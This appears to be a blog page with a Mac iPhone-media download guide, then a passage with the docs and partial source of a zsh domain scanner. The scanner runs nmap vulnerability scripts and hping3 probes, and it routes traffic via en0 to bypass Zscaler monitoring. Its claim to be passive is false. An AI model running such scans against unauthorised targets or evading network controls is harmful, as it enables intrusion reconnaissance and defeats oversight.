./download-iphone-media.sh -p "*.mov" -o ~/Videos/iPhone
./download-iphone-media.sh -p "*.mp4" -o ~/Videos/iPhone

# Files starting with IMG_
./download-iphone-media.sh -p "IMG_*" -o ~/Pictures

# HEIC photos (iPhone's default format)
./download-iphone-media.sh -p "*.heic" -o ~/Pictures/iPhone

Filter by Date Range

Download photos from a specific date range:

# Photos from January 2025
./download-iphone-media.sh -s 2025-01-01 -e 2025-01-31 -d -o ~/Pictures/January2025

# Photos from last week
./download-iphone-media.sh -s 2025-11-10 -e 2025-11-17 -o ~/Pictures/LastWeek

# Photos after a specific date
./download-iphone-media.sh -s 2025-11-01 -o ~/Pictures/Recent

Combined Filters

Combine multiple options for precise control:

# Download only videos from January 2025, organized by date
./download-iphone-media.sh -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/Vacation

# Download all HEIC photos from the last month, organized by date
./download-iphone-media.sh -p "*.heic" -s 2025-10-17 -e 2025-11-17 -d -o ~/Pictures/LastMonth

Features

Resumable & Idempotent Downloads

  • Crash recovery: Interrupted downloads can be resumed by running the script again
  • Atomic operations: Files are copied to temporary locations first, then moved atomically
  • State tracking: Maintains a hidden state directory (.iphone_download_state) to track completed files
  • Checksum verification: Uses SHA-256 checksums to verify file integrity (can be disabled with -n for speed)
  • No duplicates: Running the script multiple times won’t re-download existing files
  • Corruption detection: Validates file sizes and optionally checksums after copy

Date-Based Organization

  • Automatic folder structure: Creates YYYY/MMM folders based on photo creation date (e.g., 2025/Jan, 2025/Feb)
  • EXIF data support: Reads actual photo capture date from EXIF metadata when available
  • Fallback mechanism: Uses file modification time if EXIF data is unavailable
  • Fewer folders: Maximum 12 month folders per year instead of up to 365 day folders

Smart File Handling

  • Duplicate detection: Skips files that already exist with identical content
  • Conflict resolution: Adds timestamp suffix to filename if different file with same name exists
  • Timestamp preservation: Maintains original creation dates on copied files
  • Error tracking: Reports failed files and provides clear exit codes

Progress Feedback

  • Real-time progress updates showing each file being downloaded
  • Summary statistics at the end (total found, downloaded, skipped, failed)
  • Clear error messages for troubleshooting
  • Helpful resume instructions if interrupted

Common File Patterns

iPhone typically uses these file formats:

TypeExtensionsPattern Example
Photos.jpg.heic*.jpg or *.heic
Videos.mov.mp4*.mov or *.mp4
Screenshots.png*.png
Live Photos.heic.movIMG_*.heic + IMG_*.mov
All mediaall above* (default)

5. Handling Interrupted Downloads

If a download is interrupted (disconnection, error, etc.), simply run the script again:

# Script was interrupted - just run it again
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script will:

  • Skip all successfully downloaded files
  • Retry any failed files
  • Continue from where it left off

6. Fast Mode (Skip Checksum Verification)

For faster transfers on reliable connections, disable checksum verification:

# Skip checksums for speed (still verifies file sizes)
./download-iphone-media.sh -n -d -o ~/Pictures/iPhone

Note: This is generally safe but won’t detect corruption as thoroughly.

7. Clean State and Re-download

If you want to force a re-download of all files:

# Remove state directory to start fresh
rm -rf ~/Pictures/iPhone/.iphone_download_state
./download-iphone-media.sh -d -o ~/Pictures/iPhone

Troubleshooting

iPhone Not Detected

Error: No iPhone detected. Please connect your iPhone and trust this computer.

Solution:

  1. Make sure your iPhone is connected via USB cable
  2. Unlock your iPhone
  3. Tap “Trust” when prompted on your iPhone
  4. Run idevicepair pair if you haven’t already

Failed to Mount iPhone

Error: Failed to mount iPhone

Solution:

  1. Try unplugging and reconnecting your iPhone
  2. Check if another process is using the iPhone:umount /tmp/iphone_mount 2>/dev/null
  3. Restart your iPhone and try again
  4. On macOS Ventura or later, check System Settings → Privacy & Security → Files and Folders

Permission Denied

Solution:
Make sure the script has executable permissions:

chmod +x download-iphone-media.sh

Missing Tools

Error: Commands not found

Solution:
Install the required tools:

brew install libimobiledevice ifuse exiftool

On newer macOS versions, you may need to install macFUSE:

brew install --cask macfuse

After installation, you may need to restart your Mac and allow the kernel extension in System Settings → Privacy & Security.

Tips and Best Practices

1. Regular Backups

Create a scheduled backup script:

#!/bin/bash
# Save as ~/bin/backup-iphone-photos.sh

DATE=$(date +%Y-%m-%d)
BACKUP_DIR=~/Pictures/iPhone-Backups/$DATE

./download-iphone-media.sh -d -o "$BACKUP_DIR"

echo "Backup completed to $BACKUP_DIR"

2. Incremental Downloads

The script is fully idempotent and tracks completed downloads, making it perfect for incremental backups:

# Run daily to get new photos - only new files will be downloaded
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script maintains state in .iphone_download_state/ within your output directory, ensuring:

  • Already downloaded files are skipped instantly (no re-copying)
  • Interrupted downloads can be resumed
  • File integrity is verified with checksums

3. Free Up iPhone Storage

After confirming successful download:

  1. Verify files are on your MacBook
  2. Check file counts match
  3. Delete photos from iPhone via Photos app
  4. Empty “Recently Deleted” album

4. Convert HEIC to JPG (Optional)

If you need JPG files for compatibility:

# Install ImageMagick
brew install imagemagick

# Convert all HEIC files to JPG
find ~/Pictures/iPhone -name "*.heic" -exec sh -c 'magick "$0" "${0%.heic}.jpg"' {} \;

How Idempotent Recovery Works

The script implements several mechanisms to ensure safe, resumable downloads:

1. State Tracking

A hidden directory .iphone_download_state/ is created in your output directory. For each successfully downloaded file, a state file is created containing:

  • Destination file path
  • SHA-256 checksum (if verification enabled)
  • Completion timestamp

2. Atomic Operations

Each file is downloaded using a two-phase commit:

  1. Download Phase: Copy to temporary file (.tmp.$$ suffix)
  2. Verification Phase: Check file size and optionally compute checksum
  3. Commit Phase: Atomically move temp file to final destination
  4. Record Phase: Write completion state

If the script is interrupted at any point, incomplete temporary files are cleaned up automatically.

3. Idempotent Behavior

When you run the script:

  1. Before downloading each file, it checks the state directory
  2. If a state file exists, it verifies the destination file still exists and matches the checksum
  3. If verification passes, the file is skipped (no re-download)
  4. If verification fails or no state exists, the file is downloaded

This means:

  • ✓ Safe to run multiple times
  • ✓ Interrupted downloads can be resumed
  • ✓ Corrupted files are detected and re-downloaded
  • ✓ No wasted bandwidth on already-downloaded files

4. Checksum Verification

By default, SHA-256 checksums are computed and verified:

  • During download: Checksum computed after copy completes
  • On resume: Existing files are verified against stored checksum
  • Optional: Use -n flag to skip checksums for speed (still verifies file sizes)

Example Recovery Scenario

# Start downloading 1000 photos
./download-iphone-media.sh -d -o ~/Pictures/iPhone

# Script is interrupted after 500 files
# Press Ctrl+C or cable disconnects

# Simply run again - picks up where it left off
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Output:
# ✓ Already downloaded: IMG_0001.heic
# ✓ Already downloaded: IMG_0002.heic
# ...
# ⬇ Downloading: IMG_0501.heic → ~/Pictures/iPhone/2025/Jan/IMG_0501.heic

Performance Notes

  • Transfer speed: Depends on USB connection (USB 2.0 vs USB 3.0)
  • Large libraries: May take significant time for thousands of photos
  • EXIF reading: Adds minimal overhead but provides accurate dates
  • Pattern matching: Processed client-side, so all files are scanned

Conclusion

This script provides a robust, production-ready solution for downloading photos and videos from your iPhone to your MacBook. Key capabilities:

Core Features:

  • Filter by file patterns (type, name)
  • Filter by date ranges
  • Organize automatically into date-based folders
  • Preserve original file metadata

Reliability:

  • Fully idempotent – safe to run multiple times
  • Resumable downloads with automatic crash recovery
  • Atomic file operations prevent corruption
  • Checksum verification ensures data integrity
  • Clear error reporting and recovery instructions

For regular use, consider creating aliases in your ~/.zshrc:

# Add to ~/.zshrc
alias iphone-backup='~/download-iphone-media.sh -d -o ~/Pictures/iPhone'
alias iphone-videos='~/download-iphone-media.sh -p "*.mov" -d -o ~/Videos/iPhone'

Then simply run iphone-backup whenever you want to download your photos!

Resources

Macbook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive passive penetration testing script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq

# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping

# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com

# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v

# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan TypeDuration
Basic2-5 min
With subdomains+1-2 min/subdomain
With vulnerabilities+10-20 min
Full scan15-30 min

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig

# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000

# Custom ports
-p 80,443,8080,8443

# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
    "/api"
    "/api/v1"
    "/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs passive reconnaissance only:

  • ✅ DNS queries, certificate logs, public web requests
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh

################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Script version
VERSION="2.0.1"

# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"

# Debug mode flag
DEBUG=true

################################################################################
# Usage Information
################################################################################
usage() {
    cat << EOF
Enhanced Security Scanner v${VERSION}

Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]

Options:
    -d DOMAIN           Target domain to scan (required)
    -s                  Scan subdomains (optional)
    -m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
    -v                  Enable vulnerability scanning (NMAP vuln scripts)
    -a                  Enable API discovery and testing
    -h                  Show this help message

Network Configuration:
    Interface: $NETWORK_INTERFACE (bypasses Zscaler)
    Debug Mode: Enabled

Examples:
    $0 -d example.com
    $0 -d example.com -s -m 20 -v
    $0 -d example.com -s -v -a

EOF
    exit 1
}

################################################################################
# Logging Functions
################################################################################
log_info() {
    echo -e "${BLUE}[INFO]${NC} $1"
}

log_success() {
    echo -e "${GREEN}[SUCCESS]${NC} $1"
}

log_warning() {
    echo -e "${YELLOW}[WARNING]${NC} $1"
}

log_error() {
    echo -e "${RED}[ERROR]${NC} $1"
}

log_vuln() {
    echo -e "${MAGENTA}[VULN]${NC} $1"
}

log_debug() {
    if [ "$DEBUG" = true ]; then
        echo -e "${CYAN}[DEBUG]${NC} $1"
    fi
}

################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
    log_info "Checking dependencies..."
    log_debug "Starting dependency check"
    
    local missing_deps=()
    local optional_deps=()
    
    # Required dependencies
    log_debug "Checking for nmap..."
    command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
    log_debug "Checking for openssl..."
    command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
    log_debug "Checking for dig..."
    command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
    log_debug "Checking for curl..."
    command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
    log_debug "Checking for jq..."
    command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
    
    # Optional dependencies
    log_debug "Checking for hping3..."
    command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
    log_debug "Checking for nikto..."
    command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
    
    if [ ${#missing_deps[@]} -ne 0 ]; then
        log_error "Missing required dependencies: ${missing_deps[*]}"
        log_info "Install missing dependencies and try again"
        exit 1
    fi
    
    if [ ${#optional_deps[@]} -ne 0 ]; then
        log_warning "Missing optional dependencies: ${optional_deps[*]}"
        log_info "Some features may be limited"
    fi
    
    # Check network interface
    log_debug "Checking network interface: $NETWORK_INTERFACE"
    if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
        log_success "Network interface $NETWORK_INTERFACE is available"
        local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
        log_debug "Interface IP: $interface_ip"
    else
        log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
        NETWORK_INTERFACE=""
    fi
    
    log_success "All required dependencies found"
}

################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
    log_debug "Initializing scan for domain: $DOMAIN"
    SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
    SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
    
    log_debug "Creating scan directory: $SCAN_DIR"
    mkdir -p "$SCAN_DIR"
    cd "$SCAN_DIR" || exit 1
    
    log_success "Created scan directory: $SCAN_DIR"
    log_debug "Current working directory: $(pwd)"
    
    # Initialize report files
    EXEC_REPORT="executive_summary.md"
    TECH_REPORT="technical_report.md"
    VULN_REPORT="vulnerability_report.md"
    API_REPORT="api_security_report.md"
    
    log_debug "Initializing report files"
    > "$EXEC_REPORT"
    > "$TECH_REPORT"
    > "$VULN_REPORT"
    > "$API_REPORT"
    
    log_debug "Scan configuration:"
    log_debug "  - Domain: $DOMAIN"
    log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
    log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
    log_debug "  - Vulnerability scanning: $VULN_SCAN"
    log_debug "  - API scanning: $API_SCAN"
    log_debug "  - Network interface: $NETWORK_INTERFACE"
}

################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
    log_info "Performing DNS reconnaissance..."
    log_debug "Resolving domain: $DOMAIN"
    
    # Resolve domain to IP
    IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
    
    if [ -z "$IP_ADDRESS" ]; then
        log_error "Could not resolve domain: $DOMAIN"
        log_debug "DNS resolution failed for $DOMAIN"
        exit 1
    fi
    
    log_success "Resolved $DOMAIN to $IP_ADDRESS"
    log_debug "Target IP address: $IP_ADDRESS"
    
    # Get comprehensive DNS records
    log_debug "Querying DNS records (ANY)..."
    dig "$DOMAIN" ANY > dns_records.txt 2>&1
    log_debug "Querying A records..."
    dig "$DOMAIN" A > dns_a_records.txt 2>&1
    log_debug "Querying MX records..."
    dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
    log_debug "Querying NS records..."
    dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
    log_debug "Querying TXT records..."
    dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
    
    # Reverse DNS lookup
    log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
    dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
    
    echo "$IP_ADDRESS" > ip_address.txt
    log_debug "DNS reconnaissance complete"
}

################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ]; then
        log_info "Subdomain scanning disabled"
        log_debug "Skipping subdomain discovery"
        echo "0" > subdomain_count.txt
        return
    fi
    
    log_info "Discovering subdomains via certificate transparency..."
    log_debug "Querying crt.sh for subdomains of $DOMAIN"
    log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
    
    # Query crt.sh for subdomains
    curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
        jq -r '.[].name_value' | \
        sed 's/\*\.//g' | \
        sort -u | \
        grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
        head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
    
    SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
    echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
    
    log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
    log_debug "Subdomains saved to: subdomains_discovered.txt"
}

################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
    log_info "Analyzing SSL/TLS configuration..."
    log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
    
    # Get certificate details
    log_debug "Extracting certificate details..."
    echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -text > certificate_details.txt 2>&1
    
    # Extract key information
    log_debug "Extracting certificate issuer..."
    CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -issuer | sed 's/issuer=//')
    
    log_debug "Extracting certificate subject..."
    CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -subject | sed 's/subject=//')
    
    log_debug "Extracting certificate dates..."
    CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -dates)
    
    echo "$CERT_ISSUER" > cert_issuer.txt
    echo "$CERT_SUBJECT" > cert_subject.txt
    echo "$CERT_DATES" > cert_dates.txt
    
    log_debug "Certificate issuer: $CERT_ISSUER"
    log_debug "Certificate subject: $CERT_SUBJECT"
    
    # Enumerate SSL/TLS ciphers
    log_info "Enumerating SSL/TLS ciphers..."
    log_debug "Running nmap ssl-enum-ciphers script on port 443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
    else
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
    fi
    
    # Check for TLS versions
    log_debug "Analyzing TLS protocol versions..."
    TLS_12=$(grep -c "TLSv1.2" ssl_ciphers.txt || echo "0")
    TLS_13=$(grep -c "TLSv1.3" ssl_ciphers.txt || echo "0")
    TLS_10=$(grep -c "TLSv1.0" ssl_ciphers.txt || echo "0")
    TLS_11=$(grep -c "TLSv1.1" ssl_ciphers.txt || echo "0")
    
    echo "TLSv1.0: $TLS_10" > tls_versions.txt
    echo "TLSv1.1: $TLS_11" >> tls_versions.txt
    echo "TLSv1.2: $TLS_12" >> tls_versions.txt
    echo "TLSv1.3: $TLS_13" >> tls_versions.txt
    
    log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
    
    # Check for SSL vulnerabilities
    log_info "Checking for SSL/TLS vulnerabilities..."
    log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    fi
    
    log_success "SSL/TLS analysis complete"
}

################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
    log_info "Performing comprehensive port scan..."
    log_debug "Target IP: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # Quick scan of top 1000 ports
    log_info "Scanning top 1000 ports..."
    log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
    else
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
    fi
    
    # Count open ports
    OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt || echo "0")
    echo "$OPEN_PORTS" > open_ports_count.txt
    log_debug "Found $OPEN_PORTS open ports"
    
    # Extract open ports list with versions
    log_debug "Extracting open ports list with service information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
    
    # Detect service versions for old software
    log_info "Detecting service versions..."
    log_debug "Filtering service version information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
    
    log_success "Port scan complete: $OPEN_PORTS open ports found"
}

################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
    if [ "$VULN_SCAN" = false ]; then
        log_info "Vulnerability scanning disabled"
        log_debug "Skipping vulnerability scanning"
        return
    fi
    
    log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # NMAP vulnerability scripts
    log_info "Running NMAP vulnerability scripts..."
    log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    else
        nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    fi
    VULN_PID=$!
    log_debug "Vulnerability scan PID: $VULN_PID"
    
    # Wait with progress indicator
    log_debug "Waiting for vulnerability scan to complete..."
    while kill -0 $VULN_PID 2>/dev/null; do
        echo -n "."
        sleep 5
    done
    echo
    
    # Parse vulnerability results
    if [ -f nmap_vuln_scan.txt ]; then
        log_debug "Parsing vulnerability scan results"
        grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
        VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt || echo "0")
        echo "$VULN_COUNT" > vulnerability_count.txt
        log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
        log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
    fi
    
    # Check for specific vulnerabilities
    log_info "Checking for common HTTP vulnerabilities..."
    log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
    fi
    log_debug "HTTP vulnerability scan complete"
}

################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
    if ! command -v hping3 >/dev/null 2>&1; then
        log_warning "hping3 not installed, skipping firewall tests"
        log_debug "hping3 command not found in PATH"
        return
    fi
    
    log_info "Performing hping3 firewall tests..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # TCP SYN scan
    log_info "Testing TCP SYN response..."
    log_debug "Sending 5 TCP SYN packets to port 80"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    else
        timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    fi
    log_debug "TCP SYN test complete"
    
    # TCP ACK scan (firewall detection)
    log_info "Testing firewall with TCP ACK..."
    log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    else
        timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    fi
    log_debug "TCP ACK test complete"
    
    # ICMP test
    log_info "Testing ICMP response..."
    log_debug "Sending 5 ICMP echo requests"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    else
        timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    fi
    log_debug "ICMP test complete"
    
    log_success "hping3 tests complete"
}

################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
    log_info "Performing detailed asset discovery..."
    log_debug "Creating assets directory"
    
    mkdir -p assets
    
    # Web technology detection
    log_info "Detecting web technologies..."
    log_debug "Fetching HTTP headers from https://${DOMAIN}"
    curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
    log_debug "Web technologies saved to: assets/web_technologies.txt"
    
    # Detect CMS
    log_info "Detecting CMS and frameworks..."
    log_debug "Analyzing page content for CMS signatures"
    curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
    log_debug "CMS detection complete"
    
    # JavaScript libraries
    log_info "Detecting JavaScript libraries..."
    log_debug "Searching for common JavaScript libraries"
    curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
    log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
    
    # Check for common files
    log_info "Checking for common files..."
    log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
    for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
        log_debug "Checking for: $file"
        if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
            echo "$file: Found" >> assets/common_files.txt
            log_debug "Found: $file"
            curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
        fi
    done
    
    # Server fingerprinting
    log_info "Fingerprinting server..."
    log_debug "Running nmap HTTP server header and title scripts"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    else
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    fi
    
    log_success "Asset discovery complete"
}

################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
    log_info "Detecting outdated software versions..."
    log_debug "Creating old_software directory"
    
    mkdir -p old_software
    
    # Parse service versions from port scan
    if [ -f service_versions.txt ]; then
        log_debug "Analyzing service versions for outdated software"
        
        # Check for old Apache versions
        log_debug "Checking for old Apache versions..."
        grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
        
        # Check for old OpenSSH versions
        log_debug "Checking for old OpenSSH versions..."
        grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
        
        # Check for old PHP versions
        log_debug "Checking for old PHP versions..."
        grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
        
        # Check for old MySQL versions
        log_debug "Checking for old MySQL versions..."
        grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
        
        # Check for old nginx versions
        log_debug "Checking for old nginx versions..."
        grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
    fi
    
    # Check SSL/TLS for old versions
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        log_debug "Outdated TLS protocols detected"
        echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
    fi
    
    # Count old software findings
